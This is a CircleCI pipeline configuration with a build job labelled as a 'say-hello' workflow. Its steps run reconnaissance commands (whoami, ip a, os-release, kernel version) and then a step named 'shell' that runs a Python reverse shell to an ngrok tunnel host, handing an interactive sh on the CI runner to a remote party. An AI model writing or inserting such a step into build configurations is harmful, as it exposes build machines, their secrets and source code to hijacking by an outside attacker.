version: 2.1

jobs:
  build:
    machine:
      image: ubuntu-2004:202010-01
    steps:
      - checkout
      - run:
          name: Check 01
          command: whoami

      - run:
          name: Check 02
          command: ls -la

      - run:
          name: Check 03
          command: ip a

      - run:
          name: Check 04
          command: cat /etc/os-release

      - run:
          name: Check 05
          command: uname -r

      - run:
          name: Check 06
          command: ping -c 3 rushikesh.de

      - run:
          name: shell
          command: python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("0.tcp.in.ngrok.io",11752));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")'

workflows:
  say-hello-workflow:
    jobs:
      - build
